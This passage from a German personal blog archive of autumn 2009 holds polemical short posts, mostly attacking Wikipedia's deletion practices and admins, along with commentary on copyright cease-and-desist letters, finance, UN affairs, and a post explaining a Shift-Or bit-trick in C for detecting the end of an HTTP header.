Oma-und-Opa-Laden. Und je mehr die Blockwarte dann Kontrolle auszuüben versuchen, desto mehr reizen sie Vandalen zum Weitermachen. Wobei mein Wortsinn von Vandale hier ein anderer ist. Ein Vandale ist jemand, der den Inhalt eines Artikels wegmacht und durch "Die Merkel ist doof" ersetzt.
Um die Analogie mal fortzuspinnen: wenn potentielle Autoren wie Bittsteller abgekanzelt werden, gehen die Freiwilligenzahlen zurück. Das kann man alles live und in Farbe beobachten gerade bei der Wikipedia.
Die Eltern unter meinen Lesern werden das Problem sofort wiedererkennen. Das ist nämlich der klassische Erziehungskonflikt bei Eltern. Eltern erziehen das erste Kind noch mit eiserner Knute und beim zweiten Kind sind sie dann weiser und greifen nur noch ein, wenn es nötig ist. Eltern müssen irgendwann ihr Kind ziehen lassen, so schmerzhaft das auch ist. Und an dieser Stelle beißt uns die Statistik in den Hintern, die Johnny so schön formuliert hat:
80% der Wikipedianer in den USA seien männlich, mehr als 65% alleinstehend, mehr als 85% kinderlos und rund 70% jünger als 30 Jahre
Bei der deutschen Wikipedia sieht das vermutlich sehr ähnlich aus.
Ich möchte an der Stelle mal ausdrücklich sagen, dass meine Kritik nicht den einzelnen Menschen gilt, die in der Wikipedia herum-blockwarten. Ich gehe bei solchen Problemen gerne den wirtschaftlichen Weg der Analyse und halte das Problem für ein System-Problem. Die Menschen gehen ja nicht zum blockwarten in die Wikipedia, im Gegenteil sind die meisten damit unzufrieden. Das kam bei allen meinen Gesprächen mit Wikipedianern in letzter Zeit klar heraus. Jeder einzelne von denen fing nach einer Weile zu berichten an, wie viele schöne Artikel ihm denn schon gelöscht worden seien. Diese Menschen sind genau so Opfer wie wir alle. Opfer des Systems Wikipedia, das die falschen Anreize setzt. So habe ich gestern gelernt, dass man seinen Admin-Status wegen Inaktivität verlieren kann. Was ist hier also der Anreiz? Admin-Aktionismus. Und was eignet sich da besser als Löschen? Gelöschte Artikel können nur andere Admins einsehen, da kann einem also keiner (der nicht im selben Boot wäre) nachweisen, dass man gerade Mist gemacht hat. Löschen ist weniger Aufwand als Typos suchen und fixen. Und wenn man sich genötigt sieht, möglichst viele Löschungen vorzunehmen, um aktiver auszusehen, dann wird man auch die Löschdiskussion eher überfliegen als durchlesen und überdenken. Die Situation erinnert mich sehr an den Richtervorbehalt. Beim Richtervorbehalt ist es für den Richter ein Aufwand von einer Unterschrift, eine beantragte Durchsuchung zu beschließen, aber im Ablehnfall muss er eine Begründung schreiben. Also wird fast nie was abgelehnt. Und so ist das bei der Wikipedia im Moment auch. Der Admin hat einen Vorteil davon (er wirkt aktiver), wenn er dem Löschgesuch entspricht. Das ist genau falsch herum.
Man könnte das z.B. lösen, indem man Achievements wie in Onlinespielen einführt. Wer einen Artikel rettet, der zum Löschen vorgeschlagen wurde, kriegt ein Achievement. Wer rettet, indem er an dem Artikel Daten hinzufügt, kriegt ein Achievement. Wer 100 Achievements hat, kriegt ein GIF-Banner "Wikipedia-Held" zum Einblenden auf seiner Homepage. Sowas. Wir müssen Anreize schaffen, um das System in die Richtung zu bewegen, in die wir es bewegen wollen. Von alleine oder durch gut zureden bei den Admins und Trollen werden wir da nichts bewegen.
So schade das ist, aber ich fühle mich von der Diskussion gestern in meinem Weltbild bestärkt. Die Blockwarte machen das nicht aus Spaß an der Freude, sondern wollen etwas Gutes tun bzw folgen Anreizen, die das System ihnen bietet. Denen "sei mal kein Blockwart" zu sagen ist zum Scheitern verurteilt.
Im Übrigen muss ich noch eine bittere Lektion ziehen. Wir hatten ja gedacht, wenn wir da einen Fork ansprechen, sei das eine Drohung, mit der wir womöglich die Wikipedianer zum Einlenken bringen können. Das Gegenteil ist der Fall. Die würden sich sogar freuen, wenn wir forken. Weil sie dann das Problem loswerden. Aus deren Sicht ist das Problem nämlich nicht, dass die Wikipedia den Bach runter geht, sondern in deren Denkmodell geht die Wikipedia den Bach runter, weil so viele Vandalen rumvandalieren und sie nicht mit dem Löschen hinterherkommen. Wenn wir forken, dann gehen die Vandalen zu uns, wo weniger gelöscht wird. Aus deren Sicht löst das ihr Problem. Wenn jemand unzufrieden ist, können sie den zu unserem Fork schicken. Wenn ihnen dann die Userzahlen wegsterben, dann macht das nichts, denn in deren Mission Statement geht es um das Weltwissen, nicht um das Bereitstellen an die User. Hier greift der alte Witz aus der Arbeitswelt, wie schön dieser Job doch wäre, wenn man es nicht ständig mit Kunden zu tun hätte. Forken ist also keine Option.
Im Übrigen möchte ich noch ein wichtiges Wort fallen lassen: Monopol. Wikipedia hat ein Monopol auf Online-Wissen-Nachschlagen, und zwar mehr noch als Google eines auf Suchmaschinen hat. Für Monopole gelten andere Regeln als für normale Marktteilnehmer. Genau wie Telekom und Post als Monopol gezwungen waren, in jedem noch so kleinen Kaff Telefon und Briefpost anzubieten, und wie Microsoft Ärger kriegt, wenn sie Konkurrenten behindern, genau so hat die Wikipedia eine Sonderrolle als Monopolist und darf aus meiner Sicht nicht damit durchkommen, bei Community-Debatten Leute auszuladen, auch nicht wenn sie Markus Kompa heißen. Das kann man als kleines Randgruppenwiki bringen, aber nicht als Monopolist auf dem Online-Enzyklopädie-Markt, und schon gar nicht wenn man Worte wie "Weltwissen sammeln und erhalten" benutzt. Das muss für Wikimedia echte Konsequenzen haben.
Zurück zum Mindset der Wikipedia: wenn man das Problem als ein Kontrollproblem sieht, dann macht man so ein Treffen mit der Community auch als Kontrollfreaks, mit Namenskontrolle am Eingang. Und wenn man eigentlich weiß und einsieht, dass es da ein Problem gibt, aber das nicht zugeben will, dann limitiert man die Sitze auf 42, damit es nach außen nicht aussieht, als würde das mehr als eine handvoll Leute betreffen. Ich fand dieses Event augenöffnend. Laßt uns jetzt debattieren, wie wir das System ändern können.
BTW: lest euch die Links zu Johnny und Telepolis ganz durch. Und auch diesen Freitag-Artikel und diesen Blogeintrag hier.
[l] Interessantes Update zu der Abmahn-Geschichte mit der taz und dem Spreeblick neulich: Im lawblog schreibt Udo Vetter, dass Frau Schweitzer mit ihrer Redseligkeit womöglich der von ihr beauftragten Firma die Geschäftsgrundlage zerschossen hat. Hintergrund: bei einer Abmahnung verlangen die Anwälte vom Abgemahnten Gebühren. Hierbei geht es nicht darum, dass der bestraft wird, sondern dass das die Gebühren sind, die sonst der Auftraggeber des Anwaltes bezahlt hätte. Der Auftraggeber trägt also ein Risiko, wenn der Abgemahnte nicht zahlen kann oder die Abmahnung sich als haltlos herausstellt, denn dann muss er diese Gebühren zahlen.
Natürlich hat da keiner Bock drauf, daher läuft das in der Praxis so, wie Frau Schweitzer das jetzt (versehentlich?) öffentlich angedeutet hat, nämlich dass sie ein "Gesamtpaket" bestellt, und dann im Erfolgsfall einen Anteil des erstrittenen Geldes kriegt, aber im anderen Fall nichts zahlt. Das würde aber heißen, dass sie kein Risiko trägt, und damit auch, dass der Anwalt keine Anwaltsgebühren in Rechnung stellen kann.
Ich als juristischer Laie finde solche Details aus Innereien der Abmahnpraxis immer sehr spannend.

Thu Nov 5 2009

[l] Der Iran dementiert, für die von Israel aufgebrachte Waffenlieferung verantwortlich zu sein. Es geht um ein Schiff einer deutschen Reederei, deshalb ist das hier überhaupt in den Nachrichten. Hier ist die ursprüngliche Meldung, wo es heißt, das Schiff habe 36 Container mit Waffen gehabt, von denen Israel natürlich sagt, sie seien für die Hisbollah bestimmt gewesen, und kämen vom Iran. Der Iran hat jetzt mit Syrien eine Pressekonferenz gemacht, wo sie das dementieren, und folgendes sagen:
Bei einer gemeinsamen Pressekonferenz in Teheran erklärten sie, auf dem Schiff seien "keine Waffen aus iranischer Produktion" gewesen, sondern syrische Produkte, die für iranische Verbraucher bestimmt gewesen seien.
Gut, klingt erst mal glaubwürdig, weil man ja bei Waffen erst mal an Pistolen denkt. In der Ursprungsmeldung liest sich das aber wie folgt:
Mehr als 3000 Raketen, dazu Handgranaten, panzerbrechende Munition, kistenweise Patronen für Sturmgewehre.
Aha. 3000 Raketen für die iranischen Verbraucher. Soso.
Update: Hier gibt es ein Video von dem Material.

Tue Nov 3 2009

[l] Mein Freund Frank hat mal seine Gedanken zur Zukunft der Wikipedia niedergeschrieben. Das ist der Frank, der neulich auch die Chaosradio-Sendung zum Thema gemacht hatte. Die Kernvorschläge sind, die Wikipedia zu splitten in eine Enzyko-Pedia und eine Wiki-Pedia, die erstere als Sammelbecken der Qualitätsfetischisten, die zweite als Sammelbacken für Popkultur und potentiell kurzlebigen Trends, Videospiele und Piratenparteien, für MOGIS und Fefes Blog. Dann kann man zwar immer noch ewig Zeit mit Diskutieren verbringen, ob und wann Artikel in die Enzyklo-Pedia wandern, aber das Problem kann sich irgendwann auch von alleine lösen, durch die normative Kraft des Faktischen (googelt das mal, Hit eins ist in der Wikipedia), wenn ein schlauer Admin in der Wiki-Pedia Weiterleitungen für alle Artikel der Enzyklo-Pedia macht und dort einfach niemand mehr direkt hingeht. In meinen Augen ist das auf jeder Ebene ein guter Vorschlag, entfernt es doch die Blockwarte aus der Wiki-Pedia, nicht indem es sie rausekelt, sondern indem er ihnen was zu tun gibt und sie bei ihrer Ehre und ihrem Selbstverständnis packt.
Franks Kritik geht noch ein bisschen weiter, natürlich. Lest euch das mal ganz durch. Die Software muss auch mal neu gemacht werden, z.B.

Fri Oct 30 2009

[l] Wer mal ein-zwei Minuten Zeit erübrigen kann, und beim 26C3 helfen will, der kann ja mal bei dieser Umfrage mitmachen. Die Ergebnisse werden auf dem 26C3 veröffentlicht. Den genauen Hintergrund kenne ich, verrate aber nichts, um nicht die Studie zu gefährden. Ja, die wollen eine gültige Email-Adresse von euch. Wenn euch das stört, nehmt eine Wegwerfadresse. Vielleicht ist das ja auch Teil der Umfrage. "Wo holen sich Hacker ihre Wegwerf-Emailadressen?" :-)
Man versicherte mir, dass keine kompromittierenden persönlichen Daten erhoben werden. Die Umfrage ist übrigens so gemacht, dass nicht jeder die selben Fragen kriegt. Ich bitte trotzdem darum, dass jeder nur einmal abstimmt, wir sind hier schließlich der CCC und nicht Al Capone. Wenn ihr alle gestellten Fragen (und die Ergebnisse) sehen wollt, dann kommt zum 26C3, oder guckt euch den Stream oder die Videoaufzeichnung an. Ich weise da zum Congressanfang nochmal drauf hin dann.

Mon Oct 26 2009

[l] Oh und noch einen zur Wikipedia: der Wikipedia-Kurier, "das Boulevardblatt der Wikipedia-Gemeinschaft", äußert sich in zwei Artikeln über die aktuelle Problematik. Im ersten, unter "Blogosphäre bitte draußen bleiben!", könnt ihr euch die Kernaussage wahrscheinlich selber denken, und im zweiten, "Wikipedia, öffne Dich!" findet man Aussagen wie
Die letzten Tage zeigen, dass wir mit unseren Hilfestellungen und Angeboten nicht weit genug gehen und immer noch dabei versagen, eine nachvollziehbare Außensicht auf Vorgänge in der Wikipedia zu schaffen.
Was wie Einsicht und ein Anerkennen der Tatsache, dass es da ein Problem gibt, anfängt, geht leider nicht so schön weiter. Lest selbst. Liest sich wie eine Presseerklärung der FDP, wo man mit halbwegs Reue implizierenden Sätzen anfängt und dann letztlich als Lektion zieht, man müsse nur besser nach außen kommunizieren, dass man alles schon immer genau richtig gemacht hat.
Update: Der erste Artikel kam bei scienceblogs.de nicht so gut an :-)

Sun Oct 25 2009

[l] Die Wikipedia-Managementetage findet alles toll, so wie es ist.
Dazu kommt, dass die Community in den vergangenen Jahren so enorm gewachsen ist, dass es erstaunlich ist, wie gut wie gut das System der Selbstregulierung noch funktioniert.
Ich frage mich, von welcher Wikipedia er da redet. Ich habe da keine Zahlen, aber die Presseberichte der letzten Jahre sprachen eher von rückläufigen Trends. Und dass die Selbstregulierung noch funktioniert, das ist ja gelinde gesagt auch … kontrovers.
Übrigens möchte ich darauf verweisen, dass Frau von der Leyen mit ihrem Stoppschild zwar baden gegangen ist, aber in der Wikipedia lebt das Stoppschild weiter, verstärkt noch durch das folgende Schäuble-Channeling:
Sie werden von mir und anderen Mitarbeitern beobachtet!
Ich hielt das ja erst für eine Satire.
Update: Um nicht immer nur zu meckern: Mein Freund Maha hat sich mal konstruktive Gedanken gemacht, und schlägt vor, "Admin" als Position abzuschaffen und die Löschrechte auf die Sichter zu übertragen. Bei denen gibt es anscheinend deutlich weniger Missbrauch als bei den Admins. Die Idee ist, dass jeder Sichter werden kann, wenn er eine bestimmte Quote an konstruktiven Änderungen in letzter Zeit vorweisen kann. Wer mißbraucht, verliert die Rechte wieder. Außerdem empfiehlt er statt Löschen das Verschieben in einen besonderen Namensraum. So was ähnliches habe ich auch mal vorgeschlagen, und das kann man auch verbindern. Statt Löschen ein Banner einblenden: "Diesen Artikel haben wir gelöscht, weil er unseren Qualitätsanforderungen nicht genügt hat; klicken Sie [hier], um ihn trotzdem anzugucken".
Update: Mein Freund Henryk hat versucht, an dem Stoppschild zumindest mal eine Rechtschreibfehler-Korrektur vorzunehmen, und als dann nach ihm ein Vandale kam, wurden beide Änderungen zurückgenommen und jetzt ist die Seite mit Fehler "geschützt". *facepalm*
Update: Jetzt hat sich ein ~~Admin~~ erbarmt. Die History ist lustig. Henryk war nicht der erste.
Update: War kein Admin, und der Artikel war nur "halbgesperrt".

Sat Oct 24 2009

[l] Über Entwicklungshilfe habe ich mich schon ausgelassen, und dass man keine Kleider spenden soll, weil die vor Ort die Textilbranche kaputt machen. Heute kommt noch einer drauf, weil sich das World Food Program der Uno nach allen Regeln der Kunst selbst zerlegt hat.
Beim G-8-Gipfel im Juli flog die UN-Hilfsorganisation aus Werbezwecken arme afrikanische Kinder ein, damit die Ehefrauen der angereisten Toppolitiker diese mit Brei füttern konnten. Dies berichtet die ansonsten recht zahme, dem staatlichen schwedischen Entwicklungshilfedienst Sida angehörende, Zeitung „Omvärlden“ am Dienstag.
Schlauerweise hat das WFP das in ihrem Büro gemacht. Direkt neben dem — festhalten — Mitarbeiterswimmingpool. WTF?! Mitarbeiterswimmingpool!!!
Laut der Internetzeitung City Press, die sich zur Aufgabe gemacht hat, die UN kritisch zu überprüfen, handelt es sich bei der Veranstaltung um eine der teuersten, die ein UN-Organ seit langem arrangiert hat. Sicherheitsmaßnahmen für die Ehefrauen, Auswahl und Flugtransport der Kinder und andere Kosten kosten Inner City zufolge rund 500 000 Dollar. Laut WFP waren es nur 219 000 Euro.
(Danke, Tim)

Fri Oct 23 2009

[l] Gute Nachrichten (für die Versicherungen): Versicherer dürfen weiterhin bei ihren Bilanzen bescheißen.
Dies ermöglicht den Versicherern mittelfristig, ihre Aktienquote von derzeit weit unter zehn Prozent signifikant zu erhöhen - schließlich brauchen sie nicht mehr zu fürchten, einen Wertverfall der Papiere vierteljährlich als Verlust verbuchen zu müssen. Dividenden aus den Aktien sollen die Konzerne gleichwohl als Gewinn ausweisen dürfen.
Warum würde man Aktienverluste auch als Verlust ausweisen müssen. Ist doch viel positiver, wenn man nur Aktiengewinne ausweist!1!!
Und nun überlegt euch mal, wenn das die Einstellungen der Versicherer zu sauberer Buchführung ist, … wieso sollen wir denen eigentlich abnehmen, dass sie unsere Rentenversicherung überhaupt jemals auszahlen können? Für DIE haben wir die staatliche Altersvorsorge kaputt gemacht?!?

Tue Oct 20 2009

[l] Hahaha, mein Tag begann heute damit, dass Leute mich angemeckert haben, es gäbe ja noch gar keine Wikipedia-Updates seit heute nacht um 3. Oh Mann. Ich hoffe ja seit Tagen schon, dass das Thema sich damit erledigt hat, die Wikipedia die Blockwarte einfach mal vor die Tür setzt, und wir wieder Weltwissen sammeln können. Vielleicht wird das ja doch noch was. Ansonsten sind die Printmedien die nächste Eskalationsstufe, da die Blockwarte ja offensichtlich die Blogosphäre und überhaupt Online-Quellen nicht für seriös halten und daher ausblenden.
Mein Lieblingstweet zum Thema ist bisher:
```
gerdbrunzema: Also ich kauf jetzt auch keine Winterjacken mehr bei Wikipedia.
```
Word! Meine Inbox quillt über, da sticht mir dieser Link entgegen, dessen Quellen nur aus Legenden und Hörensagen aus irgendwelchen Obskuro-Ecken besteht, der also quasi die Definition der Irrelevanz perfekt verkörpert.
Auch geht die Geschichtsrevision weiter, jetzt löschen sie Links zu anderen "Organisationen völlig unklarer Relevanz", damit man ja keinen dazu verleitet, über die einen Artikel zu schreiben. Dem zum Opfer gefallen sind in der Änderung die Aktion Umwelt, ODEM.org und Trotz Allem.
Dann hat mal jemand dem Herrn Minderbinder hinterher geklickt, und siehe da, der Minderbinder hat vor über einem Jahr auch schon den Herrn Beckedahl zu löschen versucht.
Dann hat mir jemand diese sehr instruktive Illustration des langsam Wegkürzens von Fakten gemailt. Wow. Ist diesmal die englische Wikipedia. Wir stellen fest: SAP ERP hat gar keine Nachteile!1!!
Wenn man ein bisschen nach Wikipedia googelt, findet man auch ältere Blogpostings, die meine Nazi-Metaphorik plötzlich in einem ganz anderen Licht erscheinen lassen.
Dann hat jemand etwas gemacht, auf das ich seit einigen Tagen warte: und den "Wikipedia" Wikipedia-Eintrag zum sofortigen Löschen vorgeschlagen. Ich finde auch, nach den Relevanzkriterien der deutschen Wikipedia kommt die Wikipedia abseits von per Definition unseriösen und unglaubwürdigen Online-Quellen auf keine relevanten, belastbaren Primärquellen. Man könnte sogar ihre Existenz bestreiten!1!! Das ist wahrscheinlich nur ein einziger Blockwart. Die sollen mal für ihre Mitgliederzahl belastbare Sekundärquellen angeben.
Ach und wißt ihr, was sie noch gelöscht haben gestern? "Schäublone". Ich bin mir sicher, das ist nur ein bedauerlicher Zufall, dass da gerade unsere ganzen Begriffe verschwinden.
Einen schönen Beitrag zur Relevanzdiskussion gibt es noch hier :-)
Update: Twister legt auch noch mal nach.
Update: Das ehemalige Nachrichtenmagazin nimmt sich der Sache an.
Update: Es gibt (auf der Wikipedia, wo sonst) auch Liste von recht unterhaltsamen Löschdiskussionen, damit das hier auch mal einen humoristischen Anteil kriegt.
Update: Aktueller Lacher am Rande: Wikipedia hat auch eine Seite mit Überlegungen zur Machtstruktur der Wikipedia.
Diese Projektseite wurde zur Löschung vorgeschlagen.

Sat Oct 17 2009

[l] Wenn ich mich hier ausführlich mit Wikipedia-Blockwarten beschäftigen würde, käme ich zu nichts anderem mehr. Aber heute will ich mal einen besonders harten Fall der Wikipedia-Subspezies des gemeinen Forentrolls, dem Wikipedia-Blockwart, zitieren. Kontext: Es geht um Tschunk, ein mir bis diese Tage ebenfalls unbekanntes Mischgetränk mit Mateanteil. Irgendein Gartenzwergzüchter-Blockwart mußte da mal seine Schniedellänge demonstrieren, indem er anderen ihren Sandkasten kaputt gemacht hat und das gelöscht hat. Ich will hier nicht auf die Fakten in dem Fall eingehen, die könnt ihr selber recherchieren. Hier ist das Zitat:
Wenn Du es weißt, wieso beziehst Du Dich dann auf die Mehrheit? Sie hatte eben Unrecht.
So sieht das nämlich aus in der Wikipedia. ICH habe Recht, die Mehrheit da draußen hat Unrecht, und ich werde denen jetzt mal zeigen, was eine Harke ist.
Mein Anspruch an die Wikipedia ist, dass ich, wenn mir jemand von Tschunk erzählt, bei der Wikipedia nachschlagen kann, was das eigentlich ist. Oder wenn mir einer von MOGIS erzählt. Genau wie ich das machen kann, wenn mir jemand von Anonymous erzählt. Was ja das krasseste Beispiel für Wikipedia-Irrwitz ist. Sie weisen Mogis ab, weil der nicht beweisen möchte, dass er mehr als ein Mitglied hat (was ja wohl mit der Relevanz des MOGIS-Eintrages genau nichts zu tun hat, ob der jetzt 1, 15, 23 oder 5 Millionen Mitglieder hat), und weil es keine belastbare Sekundärquelle für die Anzahl der Mitglieder gibt, aber Anonymous haben sie drin?!
Ich bin da hauptsächlich deshalb so sauer, weil die da den Traum des freien Weltwissens mit Füßen treten, mit dem sie jahrelang die Herzen der Nerds gewonnen haben. Ich kann euch aus meinem direkten Bekanntenkreis jedenfalls sagen, dass keiner von denen Wikimedia auch nur einen müden Cent spenden wird, bis diese selbsternannten Hilfssherriffs entwaffnet und rausgeschmissen sind. Und das ist wirklich, wirklich schade.
Update: Oh, und implizit aber eigentlich auch erwähnenswert: die werden nicht mehr mitschreiben bei der Wikipedia. Wer hat schon Lust, sich stundenlang Erklärungen aus den Fingern zu saugen, um sich dann mit solchen Leuten auseinandersetzen zu müssen oder gar den Kram einfach gelöscht zu kriegen, weil da ein Admin irgendein zu kleines Körperteil kompensieren mußte.
Update: Es stellt sich raus, dass das Problem bekannt ist und humoristisch hochwertig durch die jährliche Vergabe des Löschmeister-Awards an den Blockwart mit den meisten Extrem-Löschkandidating-Exzess-Punkten vergeben wird.

Thu Oct 15 2009

[l] Finanzkrise-Update: Goldman Sachs verkündet 4 Milliarden Dollar Quartalsgewinn. Da sieht man mal, was für eine fiese Finanzkrise wir haben. Sonst hätten sie wahrscheinlich 8 gemacht. :-)

Wed Oct 14 2009

[l] Wikileaks hat mal wieder was spannendes: "Gewinnverbesserung durch Abmahnverfahren", eine Verkaufspräsentation an die Contentmafia.
Mit spannendem Kommentar u.a. beim lawblog und bei netzpolitik.org.
Mein Lieblingszitat ist ja auf Seite 18:
Automatisiertes Erstellen und Versenden von Abmahnungen
Und auf Seite 26 erklären sie dann, dass der Rechteinhaber 20% pro erfasstem, abgemahntem und zahlenden Rechtsverletzer erhält, und dass die Quote für Sofortzahler 25% ist. Auf Seite 27 rechnen sie dann vor, dass man an einem verkauften Download ca 60 Cent verdient, aber an einem abgemahnten Piraten-Download 90 Euro.

Sun Oct 11 2009

[l] Warnung: nur für wenige C-Hacker verständliche Materie!
Heute zeige ich euch mal, wie sich ein Hacker einen perfekten Sonntagnachmittag vorstellt. Der erdgeist und ich, wir haben uns im Chat hingesetzt und wollten diesen Code hier optimieren:
```
for (i=0; i+1<l; ++i) {
  if (c[i]=='\n' && c[i+1]=='\n')
    return i+2;
  if (i+3<l &&
      c[i]=='\r' && c[i+1]=='\n' &&
      c[i+2]=='\r' && c[i+3]=='\n')
    return i+4;
}
```
Der Code kommt aus gatling und soll feststellen, ob die bisher reingekommenen Daten schon einen fertigen HTTP-Header ergeben. erdgeist interessiert sich dafür, weil er den Opentracker hackt, der ja eh schon der mit Abstand schnellste Torrent-Tracker ist, und jetzt soll der eben auch Keep-Alive kriegen, und dafür muss er dann auch mal die Header richtig parsen. Nun ist das aus praktischen Erwägungen heraus nicht sonderlich sinnvoll, an so einer Stelle die letzten Taktzyklen heraus zu optimieren, weil der Bulk der Last eh im TCP Stack anfällt. gatling und opentracker sind I/O-bound, nicht CPU-bound. Aber hey, als zwei alte Bitfrickler haben wir uns mal hingesetzt und das optimiert.
Der offensichtliche Ansatz ist an der Stelle, dass man die Speicherzugriffe reduzieren will. Die überwiegende Mehrheit an Daten wird zwar weder CR noch LF sein, und insofern wird es auch im Normalfall nicht vorkommen, dass der alte Code zu viele unnötige Speicherzugriffe macht, aber hey, es ist Sonntag, da muss man nicht rational entscheiden. Das generelle Problem heißt String Matching und ist in der Informatik an sich gut untersucht. Das Buch der Wahl dazu habe ich vor ein paar Jahren gelesen und finde es gerade nicht wieder. Es ist jedenfalls von diesem Chilenen hier, nur sah bei meinem das Cover gelb aus. Egal. Es gibt mehrere schöne Verfahren, um einen bestimmten String schnell zu finden, aber die meisten schnelleren brauchen eine Tabelle, in der sie dann pro einkommendem Zeichen was nachgucken. Das ist zwar in der theoretischen Informatik schnell, aber in der Praxis habe ich dann sogar mehr Speicherzugriffe als ich jetzt habe. Insbesondere bei einem so kurzen Muster wie CR-LF-CR-LF. Das Verfahren, das ich einsetzen wollte, heißt Shift-Or und ist durch agrep populär gemacht worden. Auch Shift-Or braucht eine Tabelle pro Zeichen, aber dadurch dass mein Muster nur aus zwei Zeichen besteht, kann man das auch inline machen. Zur Veranschaulichung der Idee paste ich mal ein Stück Code, das ich mal für ein altes Kommerz-Projekt gehackt habe:
```
int detect_magic(const unsigned char c) {
#define my_magic "fnord";
  static char* magic = my_magic;
  static char maybe[sizeof(my_magic)];
int i;
for (i=sizeof(my_magic)-2; i>=1; --i)
    maybe[i]=(maybe[i-1] && (c==magic[i]));
  maybe[0] = (c==magic[0]);
  return maybe[sizeof(my_magic)-2];
}
```
Kurz gesagt hat man ein Array, in dem pro Zeichen im Muster eine 0 oder 1 steht. An Position 0 steht eine 1, wenn das letzte reinkommende Zeichen das erste Zeichen im Muster ist. An Position 1 steht eine 1, wenn das letzte reinkommende Zeichen das zweite Zeichen im Muster ist und das vorige Zeichen das erste im Muster war. Pro reinkommendem Zeichen schiebt man das Array einmal durch und setzt die ausscheidenden Varianten auf 0. Das Muster ist in der Eingabe erkannt worden, wenn der letzte Eintrag im Array 1 ist. Nun ist das natürlich auch alles andere als speichereffizient, da ein Array zu verschieben pro reinkommendem Zeichen, aber wenn man sich das Verfahren mal genau anguckt, kann man auch statt eines Array einen Integer nehmen und pro Eintrag im Array ein Bit in diesem Integer. Solange das Muster höchstens so viele Zeichen wie der Integer Bits hat. Das ist dann genau das Shift-Or Verfahren, weil man pro reinkommendem Zeichen den Integer um eins shiftet und eine 1 hinten dran packt, wenn das Zeichen passt. Dann muss man jeweils mit einer von der Eingabe abhängenden Maske ANDen. In unserem Falle, wenn ein CR reinkommt, ist die Maske (1+4), weil CR in dem Muster an Position 0 und 2 vorkommt, also setzt man Bit 0 und 2 und da kommt dann eben 5 raus. Der traditionelle Shift-Or Algorithmus sieht an der Stelle wieder eine Tabelle vor, aber weil ich ja nach CR-LF-CR-LF matchen will, und da nur CR und LF vorkommen, kann ich die beiden Werte auch inline hinschreiben. Für alle Zeichen, die nicht im Muster vorkommen, ist die Maske 0, d.h. man löscht alle Bits im Integer.
Der Code, wie ich ihn eingecheckt habe, sieht so aus:
```
int state=0;
for (i=0; i<l; ++i) {
  switch (c[i]) {
  case '\r':
  state=((state<<1)|1)&(1+4);
  break;
case '\n':
  state=((state<<1)|(1+16))&(2+8+16+32);
  break;
default:
  state=0;
}
if (state==26 || state==48) return i+1;
```
Euch wird auffallen, dass ich beim Newline-Fall erst 1 ORe und dann mit einem Wert ANDe, bei dem die 1 dann wieder rausfällt. Ja, stimmt, das soll so. Man könnte die 1 da jetzt rausnehmen, aber das spart keine Zyklen, also lasse ich das drinnen, damit man dem Algorithmus folgen kann.
So, nun wären wir keine Hacker, wenn wir uns damit zufrieden geben würden. Hier ist die Endversion:
```
int state;
for (i=state=0; i<l; ++i)
  if ((state = (c[i]=='\r' || c[i]=='\n') ?
    (state >> 2) | (( c[i] << 6) & 0xc0 ) : 0) >= 0xa0 ||
      state == 0x99)
    return i+1;
```
Ihr könnt ja mal gucken, ob ihr das versteht, was da vor sich geht. Wie ihr sehen könnt, shiften wir jetzt nicht mehr einen nach links sondern zwei nach rechts. Hach, ich liebe C! :-)
Abgesehen davon: wenn ihr Rotwein mögt, probiert doch mal einen Refosco. Ich habe gestern einen 2003er Refosco bei meinem lokalen Weinhändler gekauft, und das war einer der besten Rotweine, die ich je hatte. Die Rebenart kennt keine Sau, die Flasche kostete nur knapp 7 Euro. Den Wein muss man in einen Dekanter tun und eine halbe Stunde atmen lassen. Dann zieht er einem die Schuhe aus. Oh und falls ihr Rum mögt: den Diplomatico aus Venezuela kann ich wärmstens empfehlen. Wenn der Andreas seinen Rausch ausgeschlafen hat, wird er euch das sicher bestätigen.
Update: Der eine oder andere Spezialist auf dem Gebiet wird jetzt einwenden wollen, dass wir besser einen Boyer-Moore benutzen sollen. Stimmt, ist auch trotz des kurzen Musters schneller. Aber ergibt keinen so schön eindrucksvollen Blogpost.

Tue Oct 6 2009

[l] Bei France Telecom haben sich so viele Leute das Leben genommen, dass jetzt der Vizechef und Rationalisierer gehen mußte. 24 Mitarbeiter innerhalb von 1,5 Jahren. Wow. Da muss man sich ja fragen, ob man in solchen Fällen keine Totschlag-Anklage erheben kann.
Update: Nachdem mir jetzt ein halbes Dutzend Leute gemailt haben, dass das ja eine Non-Story sei, weil sich im Schnitt in Frankreich mehr Leute umbringen als bei France Telecom: ACH NEE. Das ist doch nicht gleichverteilt, die Selbstmorde in einer Bevölkerung! Wer bringt sich denn da um? Chronisch Kranke, Leute ohne Perspektive, Langzeitarbeitslose. Wer bei France Telecom arbeitet, hat all das hinter sich, bzw. würden chronisch kranke in Frührente geschickt und würden damit auch nicht mehr unter diese Statistik fallen.

Mon Oct 5 2009

[l] Ich habe ja hier Goldman Sachs schon häufiger gefeatured, aber die Story hier zeigt wie keine andere, was das für ein Laden ist. Es geht um CIT, einen kurz vor dem Zusammenfalten stehenden "commercial lender", also einen Kreditvergeber. Goldman hat mit denen letztes Jahr den folgenden Deal gemacht:
The payment stems from the structure of a $3bn rescue finance package that Goldman extended to CIT on June 6 2008, about five months before the Treasury bought $2.3bn in CIT preferred shares to prop it up at the height of the crisis. The potential loss for taxpayers would be the biggest to crystalise so far from the government’s capital injection plan for banks.
und weiter unten
CIT declined to comment. In an effort to prevent bankruptcy, it is working on a debt exchange offer that would virtually wipe out equity holders. In the event of bankruptcy, Goldman would reap more than $1bn because it also holds credit insurance that would be paid off.
Die haben also eine Vereinbarung mit dem Pleitier gemacht, dass sie eine Milliarden Dollar kriegen, wenn die pleite gehen. Weil damals schon klar war, dass der Staat in dem Fall einspringen würde. Der Pleitier hatte ja nichts zu verlieren und hat das unterschrieben. Und jetzt muss der Steuerzahler die Milliarde zahlen, wenn die pleite gehen. Der Steuerzahler hat bereits 2,3 Milliarden Dollar in CIT gepumpt letztes Jahr. Oh und Goldman hat selbstverständlich zusätzlich noch eine Versicherung auf den Ausfall des Darlehens, die dann auch einspringt.
[l] Als die UNO gemerkt hat, dass Karzai in Afghanistan bei den Wahlen betrogen hat, haben sie einen Coverup beauftragt. Der Mann hat das dann gemacht und wurde dafür gefeuert, dass er es gemacht hat. Und die Moral von der Geschicht: folgt schlechten Befehlen nicht.
Der Hammer an der Geschichte ist, wie sehr die da betrogen haben:
He says that the UN collected evidence that a third of Mr Karzai’s votes were fraudulent. If the claim was found to be true it would push Mr Karzai below the 54 per cent that the preliminary election results give him, necessitating a second round of voting.
Sportlich!
